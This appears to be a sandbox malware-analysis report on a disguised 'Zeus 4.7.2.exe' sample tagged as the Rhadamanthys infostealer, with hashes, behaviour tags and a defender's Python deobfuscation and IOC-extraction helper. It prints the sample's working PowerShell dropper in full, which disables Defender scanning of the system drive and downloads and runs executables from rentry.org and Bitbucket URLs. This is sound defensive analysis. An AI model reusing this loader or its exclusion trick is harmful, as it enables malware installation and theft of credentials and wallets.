Resubmissions

07/06/2024, 15:13 UTC

240607-slps8aac5v 10

07/06/2024, 15:11 UTC

240607-sk3zfsbb99 10

07/06/2024, 15:08 UTC

240607-sh7vmaac2s 10

07/06/2024, 15:05 UTC

240607-sgnqcsbb65 10

General

  • Target

    Nicht bestätigt 879324.crdownload

  • Size

    1.4MB

  • Sample

    240607-slps8aac5v

  • MD5

    e3970ffa96653f138e63ad0148970dac

  • SHA1

    b466278571bc1b20f2cf767b2222c17449ee1dbc

  • SHA256

    5a32b1864bcb2d237aca956c3b7474c2de484c38cbaa608ab5ffc71214bae2b8

  • SHA512

    af9e28a39cda24521ad4239d8c616bffbb63a44ae3efedbf9320f83146b5ada758fc2d76fdba07e89bf9066088fd7159650b66c998549c49fbdade1022c0a163

  • SSDEEP

    24576:CvJwL1rOBrsdTKf8oyVJHOohsXiV61rbXWcbd7JFV9MGiwS5OlliRw+gj8jbpRtQ:yJwxrOBaTKf8NVtOPXdbNHFVKc/izgjz

Malware Config

Extracted

Language
ps1
Source

<#bji#> Add-MpPreference <#gap#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#zkd#> -Force <#hep#>;$wc = (New-Object System.Net.WebClient);$lnk = $wc.DownloadString('https://rentry.org/lem61111111111/raw').Split([string[]]"`r`n", [StringSplitOptions]::None); $fn = [System.IO.Path]::GetRandomFileName(); for ($i=0; $i -lt $lnk.Length; $i++) { $wc.DownloadFile($lnk[$i], <#nmy#> (Join-Path <#cpg#> -Path $env:AppData <#jig#> -ChildPath ($fn + $i.ToString() + '.exe'))) }<#bwf#>; for ($i=0; $i -lt $lnk.Length; $i++) { Start-Process -FilePath <#nzz#> (Join-Path -Path $env:AppData <#qua#> -ChildPath ($fn + $i.ToString() + '.exe')) } <#idz#>

URLs
ps1.dropper

https://rentry.org/lem61111111111/raw

Extracted

Language
ps1
Deobfuscated

(new-object system.net.webclient).downloadfile("https://bitbucket.org/43g34g34g34/34g34g34g34g/raw/e946dd91d069dd0a14070ddbc4920354650bd041/lem.rar", "C:\\Users\\Admin\\AppData\\Local\\Temp\\downloaded_archive.rar")

URLs
exe.dropper

https://bitbucket.org/43g34g34g34/34g34g34g34g/raw/e946dd91d069dd0a14070ddbc4920354650bd041/lem.rar
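The first-stage PowerShell above is padded with throwaway `<#xxx#>` block comments between tokens, which breaks naive string matching on `Add-MpPreference -ExclusionPath` or `DownloadString(`. The following triage helper is an added example, not tria.ge output or the sample's own code: it strips the block comments, pulls the download URLs out of both extracted stages, lists the Defender exclusion paths, and tags the behaviours a defender would want to alert on. The two stage strings are copied from the extracted config above; the indicator names (`defender_exclusion`, `spawns_dropped_exe`, and so on) are this example's own labels, not tria.ge signature names.

```python
import re

# Copies of the two PowerShell stages extracted in this report, embedded so the
# example runs offline. STAGE1 is the comment-spliced dropper; STAGE2 is the
# second-stage downloader tria.ge shows already deobfuscated.
STAGE1 = (
    "<#bji#> Add-MpPreference <#gap#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) "
    "<#zkd#> -Force <#hep#>;$wc = (New-Object System.Net.WebClient);"
    "$lnk = $wc.DownloadString('https://rentry.org/lem61111111111/raw')"
    ".Split([string[]]\"`r`n\", [StringSplitOptions]::None); "
    "$fn = [System.IO.Path]::GetRandomFileName(); "
    "for ($i=0; $i -lt $lnk.Length; $i++) { $wc.DownloadFile($lnk[$i], <#nmy#> "
    "(Join-Path <#cpg#> -Path $env:AppData <#jig#> -ChildPath ($fn + $i.ToString() + '.exe'))) }"
    "<#bwf#>; for ($i=0; $i -lt $lnk.Length; $i++) { Start-Process -FilePath <#nzz#> "
    "(Join-Path -Path $env:AppData <#qua#> -ChildPath ($fn + $i.ToString() + '.exe')) } <#idz#>"
)
STAGE2 = (
    '(new-object system.net.webclient).downloadfile("https://bitbucket.org/43g34g34g34/'
    '34g34g34g34g/raw/e946dd91d069dd0a14070ddbc4920354650bd041/lem.rar", '
    r'"C:\\Users\\Admin\\AppData\\Local\\Temp\\downloaded_archive.rar")'
)

# PowerShell block comments: <# ... #>, possibly spanning lines.
BLOCK_COMMENT = re.compile(r"<#.*?#>", re.DOTALL)
# Anything that looks like an http(s) URL, stopping at quotes, parens and whitespace.
URL_RE = re.compile(r"https?://[^\s'\"\)]+", re.IGNORECASE)
# The argument list of -ExclusionPath @( ... ).
EXCLUSION_RE = re.compile(r"-ExclusionPath\s+@\(([^)]*)\)", re.IGNORECASE)

# Behaviour tags (example's own names). Each runs over the comment-stripped
# script, so the <#gap#> padding cannot split the tokens being matched.
INDICATORS = {
    "defender_exclusion": re.compile(r"Add-MpPreference\b.*?-ExclusionPath", re.I | re.S),
    "remote_download_string": re.compile(r"\.DownloadString\(", re.I),
    "remote_download_file": re.compile(r"\.DownloadFile\(", re.I),
    "spawns_dropped_exe": re.compile(r"Start-Process\b.*?\.exe", re.I | re.S),
    "writes_to_appdata": re.compile(r"\$env:AppData", re.I),
}


def strip_block_comments(script: str) -> str:
    """Remove <# ... #> comments and collapse the whitespace runs they leave."""
    cleaned = BLOCK_COMMENT.sub("", script)
    return re.sub(r"[ \t]+", " ", cleaned).strip()


def extract_urls(script: str) -> list[str]:
    """Unique URLs in the script, in sorted order for stable comparison."""
    return sorted(set(URL_RE.findall(strip_block_comments(script))))


def exclusion_paths(script: str) -> list[str]:
    """Paths handed to Add-MpPreference -ExclusionPath, or [] if none."""
    match = EXCLUSION_RE.search(strip_block_comments(script))
    if not match:
        return []
    return [p.strip().strip("'\"") for p in match.group(1).split(",") if p.strip()]


def classify(script: str) -> dict:
    """Deobfuscate one stage and summarise its IOCs and behaviour tags."""
    cleaned = strip_block_comments(script)
    return {
        "deobfuscated": cleaned,
        "urls": extract_urls(cleaned),
        "defender_exclusions": exclusion_paths(cleaned),
        "indicators": sorted(name for name, rx in INDICATORS.items() if rx.search(cleaned)),
        "comments_removed": len(BLOCK_COMMENT.findall(script)),
    }


if __name__ == "__main__":
    for label, stage in (("stage1", STAGE1), ("stage2", STAGE2)):
        report = classify(stage)
        print(f"[{label}] removed {report['comments_removed']} block comments")
        print(f"[{label}] urls: {report['urls']}")
        print(f"[{label}] defender exclusions: {report['defender_exclusions']}")
        print(f"[{label}] indicators: {report['indicators']}")
        print(f"[{label}] deobfuscated: {report['deobfuscated']}")
```

Two points worth noting from the output. First, the exclusion list contains `$env:SystemDrive`, which exempts the entire system drive from Microsoft Defender scanning rather than a single folder, so on any host where this stage ran the `ExclusionPath` property of `Get-MpPreference` should be checked and cleared before trusting later scan results. Second, the rentry.org paste is only a list of further URLs; the second stage (the Bitbucket `lem.rar`) is what actually carries the payload, so both hosting URLs belong in the blocklist, not just the first.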

Targets

    • Target

      Zeus 4.7.2.exe

    • Size

      173KB

    • MD5

      28e0ba051ad84949cfedd2a58b1636cb

    • SHA1

      6ff46613adb7594c6abbe0ee9c64a68129501fb8

    • SHA256

      265013eb61e407130b8fe723809549000ffe4ad96ef6c5ad1945e2727cee5aa0

    • SHA512

      a14ea1a7e8756e15aee996c848006a1f2212acd753ca1629224b362fe8ef24331c49617f59bd84846b95a2143744418bbd78a4d0088efab76228344662ae67a4

    • SSDEEP

      3072:NPBBih6XScZZmmiyQrcR6qx6LAIxkN3wlCxvxrtJRscwX7zhhxXNrykAOkvpObQ:Nyh6XffliyQrC6LAIxkpwlOJrtJRscwi

    • Rhadamanthys

      Rhadamanthys is an information stealer written in C++, first seen in August 2022.

    • Suspicious use of NtCreateUserProcessOtherParentProcess

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Using powershell.exe command.

    • Creates new service(s)

    • Drops file in Drivers directory

    • Stops running service(s)

    • Executes dropped EXE

    • Reads user/profile data of local email clients

      Email clients store some user data on disk where infostealers will often target it.

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Accesses cryptocurrency files/wallets, possible credential harvesting

    • Adds Run key to start application

    • Legitimate hosting services abused for malware hosting/C2

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

    • Maps connected drives based on registry

      Disk information is often read in order to detect sandboxing environments.

    • Drops file in System32 directory

    • Suspicious use of SetThreadContext

    • Target

      ZeusHex-GUI.dll

    • Size

      1.3MB

    • MD5

      ad714ee48d2e829c5012c65de6166c05

    • SHA1

      5880bac89ca346dae62c053aa49c028372388edd

    • SHA256

      7d32d13d123871650794a1e172adc70bc8dafbdb762f49d889f813844d532b20

    • SHA512

      a51252950455dbfb5dfd564689e605b022bdf26f80ad12f3fde3e341a14b8f764324ff3be6f29e4855bd499141e23628e9aabb0e439627dc802814db091d54ee

    • SSDEEP

      24576:ZfaPwrgBrO1BKH8jPcWYVxHCoh0XeV61r9qZWe7d7NWS91GsVz9cebgS9aI:ZCPwrgBWBKH8jkDVFCNXODzWS9HfX0HI

    Score
    1/10
